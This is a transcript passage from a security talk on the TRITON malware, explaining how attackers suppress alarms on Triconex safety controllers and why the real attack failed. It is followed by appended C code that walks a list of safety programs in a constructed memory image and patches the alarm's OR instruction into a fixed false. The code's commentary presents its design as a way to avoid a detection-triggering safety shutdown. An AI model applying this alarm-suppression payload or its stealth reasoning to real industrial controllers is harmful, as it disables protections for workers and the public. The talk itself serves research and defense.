possible payload, which is alarm suppression. So let's say we want to mess, for example, with a chemical process like this, and our goal is catalyst deactivation. Now, industrial processes have alarms, so if something is about to go into an unsafe state or something is out of bounds, an alarm is raised somewhere in the process, and these are propagated through the process and eventually lead to a safety shutdown. And as an attacker we want to prevent this, because we want the attack to continue. So how do we go about this? We can hide the alarms by compromising, like, the Safety View or the DCS view or some local HMIs, and this is the benefit of, you know, hiding them centrally, but still these alarms go out as network traffic, right, and we don't want any kind of network inspection to see these alarms. So we want to suppress them either at the field level, the level of the field devices, or at the level of the safety controller itself, which is what Triconex is. So for Triconex you actually have
Safety View, which is a PC-based HMI solution that allows for management and bypasses of all these alarms, and each HMI function is mapped to a Triconex logic function block, and that looks... Somewhat... that was a little bit too quick. That looks something like this: so you have, for example, a water tank level alarm here; you have a water-high, water-low signal, and an OR of them raises an alarm. So as an attacker: these safety programs reside in memory as code, which is how we got, you know, execution in the first place, so the OT payload here could modify the instructions to set the alarm to a fixed false, regardless of the water levels that are coming as inputs to this alarm function. The attacker needs to know, of course, first where the program lives in memory and which instructions of the program to modify. Now luckily, for Triconex these programs are stored as a circular linked list in memory, as you can see here; this is actually our implant living in memory, and then you can walk this linked list and find the target program you want to modify. And this is what basically the alarm looks like: the core of the logic is a simple OR instruction, which the attacker can then, you know, hot-patch. You know, it's PowerPC, it's a RISC architecture with a fixed instruction size, so we just set it to a fixed false there; it's relatively easy. And this is the result that comes out of it: on the left you have normal functionality, you know, water is getting dangerously high, the alarm's going off; on the right you have the exploited functionality, water is getting dangerously high, alarm sleeping. All right, so some more
speculation: why did this attack fail? I don't think we mentioned that, but the attack was discovered because it failed in the actual field; it caused a safety shutdown of the process. There are a couple of possibilities: you could have had a bad payload and, you know, the privilege escalation could have failed; it could have targeted a different firmware version than the one they actually had developed the exploit for, which could have caused an access violation. I mean, the backdoor allows for raw reading, writing and executing of memory; they could have caused some memory corruption by, you know, a payload that was written wrongly. They could have gotten into a fight with the watchdog, so very common on embedded systems: you have this watchdog timer and you need to periodically kick it to keep the counter high, because if the counter expires it resets the CPU. Or it could have missed some additional diagnostics; I mean, there's a ton of diagnostics functionality in here, and just because they patched the RAM and ROM check doesn't mean that they patched everything rightly. These are all options, and our option is that they got into a fight with the triple modular redundancy. I mean, this is just the voting on the inputs and the outputs, but it's a very complicated patent that covers a lot of ground, and it could have been that the OT payload violated something in the triple modular redundancy that in turn led to a safety shutdown. That brings us to the
conclusions, which I'll give to Marina again. We probably have just, like, a couple of minutes for conclusions, so just to summarize: so, I mean, again, the purpose was also to go through this process of developing implants for the embedded system and see whether it is really that complicated. So what is the actual, real threat? Is it only for the elite, and we should not expect this type of attack or implants on a mass scale, or not? And apparently it is not. Not only is exploitation and implanting of industrial control systems relatively easy, like it's cheap because there are no exploit mitigations, but also obtaining equipment is relatively easy; we went through the process; obtaining documentation is relatively easy. So you kind of have all of the needed components to quickly obtain code execution and be able to backdoor this type of devices. So exploit development, again, easy. If I will just go quickly through this: implant development, relatively easy. So for example in the case of TRITON the attacker already had privileges; typically on industrial control systems you would not have, like, separation of privileges, so the attacker had no need to escalate his privileges. However, for example in the case of a safety system you typically have this triple, like, redundancy, sometimes it's quadruple redundancy, which makes things a little bit complicated because you have to reverse-engineer more. So the most difficult part, which we were able to establish, is actually developing OT payloads, so basically my task is harder, and especially whenever we come together, like for example Jos and I come together: this is my wish list and he already has an implant; this is where reverse engineering starts to get going further, and that is becoming more difficult. So basically the open questions which we have, and this I think Jos has covered very nicely, is that what we've seen is probably just one tool among many, so basically development costs should be seen as relatively low, and I think what we definitely should expect relatively soon is copycats, as security is a fashionable industry. So as soon as, for example, somebody releases the first ransomware malware, everybody will be designing ransomware malware; so this is what we're probably going to see: many more other, like, state-sponsored threat actors will join this, basically, game. And again it's not necessarily so; this is what, like, people ask: on one hand, yes, it's easy to exploit, then why don't we see a lot of those attacks? Because first of all you have to have a motive, why would you do that, and secondly it's of course, like, crossing this red line. So on one hand it probably will be something like the nuclear weapons: you will have the arsenal and maybe you will be showing the capabilities just in a slight manner, like it has happened with power grid attacks in Ukraine: you just show that you are capable, but you do not cause massive, like, damage which hurts. So you basically will be having, it is like an economic and political negotiation. So we wanted to thank a couple of people, including Felix Lindner, who was, like, a frequent DEF CON speaker, who kindly helped us to review the slides. We have the slides with the toolkit which you will need, and with that we are at the end, and thank you very much for your attention. [Applause]
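Added example (editor's illustration after the talk, not code from the speakers or from the TRITON framework): the alarm-suppression step described in the talk, walking a circular linked list of logic programs in a memory image, finding the target program, and hot-patching the PowerPC `or` at the core of the alarm logic into a fixed false. The list node layout, program names, and memory image are constructed for this example and are hypothetical; they are not the Triconex layout. The instruction encodings used, `or rA,rS,rB` (opcode 31, extended opcode 444) and `li rD,0` (`addi rD,0,0`, opcode 14), are the standard PowerPC ones, and the fixed 4-byte instruction size is what makes the in-place patch safe.

```c
/* Added example, not from the talk: walk a circular linked list of logic
 * programs in a (constructed) memory image and hot-patch the PowerPC `or`
 * that computes an alarm into `li rA,0`, a fixed false.  The node layout
 * below is hypothetical, made up for this example; it is NOT the Triconex
 * layout.  Instruction encodings are the standard PowerPC ones. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE   4096u
#define NODE_SIZE  24u   /* hypothetical node: next(4) name(12) code_off(4) code_len(4) */
#define MAX_NODES  64    /* bound on the walk: a corrupt list must not spin forever */
#define OPC_X      31u   /* PowerPC extended-opcode family (or, and, xor, ...) */
#define XO_OR      444u  /* extended opcode of `or rA,rS,rB` */
#define OPC_ADDI   14u   /* `li rD,imm` is `addi rD,0,imm` */

/* PowerPC is big-endian; the image is accessed as bytes to avoid alignment issues. */
uint32_t rd32be(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}
void wr32be(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Encoders for the two instructions involved. */
uint32_t ppc_or(unsigned ra, unsigned rs, unsigned rb) {
    return (OPC_X << 26) | (rs << 21) | (ra << 16) | (rb << 11) | (XO_OR << 1);
}
uint32_t ppc_li(unsigned rd, int16_t imm) {
    return (OPC_ADDI << 26) | (rd << 21) | (uint32_t)(uint16_t)imm;
}
/* Decoder: if insn is `or rA,rS,rB` (Rc=0) return rA, else -1. */
int ppc_or_dest(uint32_t insn) {
    if ((insn >> 26) != OPC_X || ((insn >> 1) & 0x3ffu) != XO_OR || (insn & 1u))
        return -1;
    return (int)((insn >> 16) & 0x1fu);
}

/* Walk the circular list from head; return the node offset of `name`, or -1. */
long find_program(const uint8_t *img, uint32_t head, const char *name) {
    uint32_t cur = head;
    for (int i = 0; i < MAX_NODES; i++) {
        if (cur + NODE_SIZE > MEM_SIZE) return -1;            /* pointer leaves the image */
        if (strncmp((const char *)img + cur + 4, name, 12) == 0) return (long)cur;
        cur = rd32be(img + cur);                              /* follow `next` */
        if (cur == head) break;                               /* wrapped around: not found */
    }
    return -1;
}

/* Replace every `or rA,rS,rB` in the program's code with `li rA,0` (fixed false).
 * Returns the number of patched instructions, or -1 if the program is not found. */
int patch_alarm(uint8_t *img, uint32_t head, const char *name) {
    long node = find_program(img, head, name);
    if (node < 0) return -1;
    uint32_t off = rd32be(img + node + 16), len = rd32be(img + node + 20);
    if ((off + len > MEM_SIZE) || ((off | len) & 3u)) return -1;  /* bounds + alignment */
    int patched = 0;
    for (uint32_t a = off; a < off + len; a += 4) {           /* fixed 4-byte instructions */
        int ra = ppc_or_dest(rd32be(img + a));
        if (ra >= 0) { wr32be(img + a, ppc_li((unsigned)ra, 0)); patched++; }
    }
    return patched;
}

/* Constructed image (hypothetical): three programs in a circular list, head at VALVE_1. */
static void put_node(uint8_t *img, uint32_t at, uint32_t next, const char *name,
                     uint32_t code_off, uint32_t code_len) {
    wr32be(img + at, next);
    memset(img + at + 4, 0, 12);
    strncpy((char *)img + at + 4, name, 11);
    wr32be(img + at + 16, code_off);
    wr32be(img + at + 20, code_len);
}
uint32_t build_image(uint8_t *img) {
    memset(img, 0, MEM_SIZE);
    put_node(img,  0, 24, "PUMP_CTL", 0x100, 8);
    put_node(img, 24, 48, "VALVE_1",  0x140, 8);
    put_node(img, 48,  0, "TANK_LVL", 0x180, 8);
    wr32be(img + 0x100, ppc_or(6, 3, 4)); wr32be(img + 0x104, 0x4e800020u); /* blr */
    wr32be(img + 0x140, ppc_or(7, 8, 9)); wr32be(img + 0x144, 0x4e800020u);
    wr32be(img + 0x180, ppc_or(5, 3, 4)); wr32be(img + 0x184, 0x4e800020u); /* alarm = hi OR lo */
    return 24;                                                /* list head */
}

int main(void) {
    static uint8_t img[MEM_SIZE];
    uint32_t head = build_image(img);
    printf("TANK_LVL before: %08x\n", rd32be(img + 0x180));  /* 7c652378 = or r5,r3,r4 */
    printf("patched %d instruction(s)\n", patch_alarm(img, head, "TANK_LVL"));
    printf("TANK_LVL after:  %08x\n", rd32be(img + 0x180));  /* 38a00000 = li r5,0 */
    return 0;
}
```

Only the target program's code is touched; the other programs in the list keep their `or` instructions, which is the point of walking the list rather than pattern-scanning all of memory. The walk is bounded and bounds-checked because, as the talk notes, a payload that faults or corrupts memory on the controller is one of the plausible ways such an attack gets noticed through a safety shutdown.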